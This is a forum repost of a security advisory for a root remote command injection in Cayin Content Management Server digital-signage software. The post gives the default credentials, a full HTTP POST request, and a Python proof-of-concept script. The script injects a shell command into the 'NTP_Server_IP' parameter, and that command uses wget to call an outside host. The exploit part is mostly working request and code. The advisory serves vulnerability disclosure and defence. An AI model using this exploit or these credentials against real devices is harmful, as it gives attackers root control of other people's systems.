1. Здраво и добредојдовте на форумот на IT.mk.

    Доколку сеуште не сте дел од најголемата заедница на ИТ професионалци и ентузијасти во Македонија, можете бесплатно да се - процесот нема да ви одземе повеќе од 2-3 минути, а за полесна регистрација овозможивме и регистрирање со Facebook и Steam.

Cayin Content Management Server 11.0 Root Remote Command Injection

Дискусија во форумот 'Ранливости // Експлоити // Закрпи' започната од zeroscience, 4 Јуни 2020.

  1. zeroscience

    ZSL Bot v4.89.1.00

    31 Мај 2010
    Cayin Content Management Server 11.0 Root Remote Command Injection
    Vendor: CAYIN Technology Co., Ltd.
    Product web page: https://www.cayintech.com
    Affected version: CMS-SE v11.0 Build 19179
                      CMS-SE v11.0 Build 19025
                      CMS-SE v11.0 Build 18325
                      CMS Station (CMS-SE-LXC)
                      CMS-60 v11.0 Build 19025
                      CMS-40 v9.0 Build 14197
                      CMS-40 v9.0 Build 14099
                      CMS-40 v9.0 Build 14093
                      CMS-20 v9.0 Build 14197
                      CMS-20 v9.0 Build 14092
                      CMS v8.2 Build 12199
                      CMS v8.0 Build 11175
                      CMS v7.5 Build 11175
    Summary: CAYIN Technology provides Digital Signage
    solutions, including media players, servers, and
    software designed for the DOOH (Digital Out-of-home)
    networks. We develop industrial-grade digital signage
    appliances and tailored services so you don't have
    to do the hard work.
    Desc: CAYIN CMS suffers from an authenticated OS
    semi-blind command injection vulnerability using
    default credentials. This can be exploited to inject
    and execute arbitrary shell commands as the root
    user through the 'NTP_Server_IP' HTTP POST parameter
    in system.cgi page.
    Tested on: Apache/1.3.42 (Unix)
    Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
    Advisory ID: ZSL-2020-5570
    Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5570.php
    Session created with default credentials (webadmin:bctvadmin).
    HTTP POST Request:
    POST /cgi-bin/system.cgi HTTP/1.1
    Content-Length: 201
    Pragma: no-cache
    Cache-Control: no-cache
    Upgrade-Insecure-Requests: 1
    User-Agent: Smith
    Content-Type: application/x-www-form-urlencoded
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: cy_lang=ZH_TW; cy_us=67176fd7d3d05812008; cy_en=c8bef8607e54c99059cc6a36da982f9c009; WEB_STR_RC_MGR=RC_MGR_WEB_PLAYLIST; WEB_STR_SYSTEM=SYSTEM_SETTING; cy_cgi_tp=1591206269_15957
    Connection: close
    save_system: 1
    system_date: 2020/5/16    06:36:48
    TIMEZONE: 49
    NTP_Service: 1
    NTP_Server_IP: $(wget -q -U 'MyVoiceIsMyPassportVerifyMe' vrfy.zeroscience.mk)
    TEST_NTP: 測試
    reboot1: 1
    reboot_sel1: 4
    reboot_sel2: 1
    reboot_sel3: 1
    font_list: ZH_TW
    Request recorder @ ZSL:
    Origin of HTTP request:
    HTTP GET request to vrfy.zeroscience.mk:
    GET / HTTP/1.0
    User-Agent: MyVoiceIsMyPassportVerifyMe
    Host: vrfy.zeroscience.mk
    Accept: */*
    Connection: Keep-Alive
    PoC script:
    import requests
    url = ""
    cookies = {"cy_lang": "ZH_TW",
               "cy_us": "67176fd7d3d05812008",
               "cy_en": "c8bef8607e54c99059cc6a36da982f9c009",
               "WEB_STR_RC_MGR": "RC_MGR_WEB_PLAYLIST",
               "WEB_STR_SYSTEM": "SYSTEM_SETTING",
               "cy_cgi_tp": "1591206269_15957"}
    headers = {"Cache-Control": "max-age=0",
               "Origin": "",
               "Content-Type": "application/x-www-form-urlencoded",
               "User-Agent": "Smith",
               "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
               "Referer": "",
               "Accept-Encoding": "gzip, deflate",
               "Accept-Language": "en-US,en;q=0.9",
               "Connection": "close"}
    data = {"save_system": "1",
            "system_date": "2020/5/16    06:36:48",
            "TIMEZONE": "49",
            "NTP_Service": "1",
            "NTP_Server_IP": "$(wget -q -U 'MyVoiceIsMyPassportVerifyMe' vrfy.zeroscience.mk)", # `cmd` or &cmd&
            "TEST_NTP": "\xe6\xb8\xac\xe8\xa9\xa6",
            "reboot1": "1",
            "reboot_sel1": "4",
            "reboot_sel2": "1",
            "reboot_sel3": "1",
            "font_list": "ZH_TW"}
    requests.post(url, headers=headers, cookies=cookies, data=data)

    Zero Science Lab » Cayin Content Management Server 11.0 Root Remote Command Injection